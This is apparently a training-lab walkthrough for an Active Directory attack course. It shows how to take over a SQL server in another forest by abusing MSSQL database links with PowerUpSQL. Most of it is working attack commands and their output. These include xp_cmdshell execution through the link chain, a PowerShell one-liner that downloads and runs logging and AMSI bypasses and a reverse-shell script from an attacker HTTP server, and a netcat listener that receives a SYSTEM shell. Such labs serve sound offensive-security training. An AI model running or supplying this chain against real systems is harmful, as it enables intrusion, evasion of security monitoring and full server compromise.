Task
Get a reverse shell on a SQL server in eurocorp forest by abusing database links from dcorpmssql.
First, enumerate SQL servers in the domain and if student has privileges to connect to any of them. Run Invishell and use PowerUpSQL to enumerate.
Copy PS C:\Users\student372> Import-Module C:\AD\Tools\PowerUpSQL-master\PowerUpSQL.psd1
# Look for SPNs that start with MSSQL*
PS C:\Users\student372> Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose
Since we can connect to dcorp-mssql, we can use Get-SQLServerLinkCrawl to crawl the database links automatically.
Copy PS C:\Users\student372> Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -Verbose
VERBOSE: Server: EU-SQL24
VERBOSE: --------------------------------
VERBOSE: - Link Path to server: DCORP-MSSQL -> DCORP-SQL1 -> DCORP-MGMT -> EU-SQL24.EU.EUROCORP.LOCAL
VERBOSE: - Link Login: sa
VERBOSE: - Link IsSysAdmin: 1
VERBOSE: - Link Count: 0
VERBOSE: - Links on this server:
We have sysadmin on EU-SQL24 server.
If xp_cmdshell is enabled, it is possible to execute commands on EU-SQL24.
To avoid dealing with a large number of quotes and escapes, use the following command:
Copy Get-SQLServerLinkCrawl -Instance dcorpmssql.dollarcorp.moneycorp.local -Query "exec master..xp_cmdshell 'set username'"
To get a reverse shell, we'll use Invoke-PowerShellTcpEx.ps1
Create a copy of Invoke-PowerShellTcpEx.ps1 and rename it to Invoke-PowerShellTcpEx1.ps1.
Add "Power -Reverse -IPAddress 172.16.100.X -Port 443" (without quotes) to the end of the file.
Host the files on attacker HTTP server. Start a listener using netcat.
Copy Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell ''powershell -c "iex (iwr -UseBasicParsing http://172.16.100.72/sbloggingbypass.txt);iex (iwr -UseBasicParsing http://172.16.100.72/amsibypass.txt);iex (iwr -UseBasicParsing http://172.16.100.72/Invoke-PowerShellTcpEx.ps1)"''' -QueryTarget eu-sql24
On Listener:
Copy C:\Users\student372>cd C:\AD\Tools\netcat-win32-1.12\
C:\AD\Tools\netcat-win32-1.12>nc64.exe -lvnp 443
listening on [any] 443 ...
connect to [172.16.100.72] from (UNKNOWN) [172.16.15.17] 56942
Windows PowerShell running as user SYSTEM on EU-SQL24
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32>
Last updated 3 months ago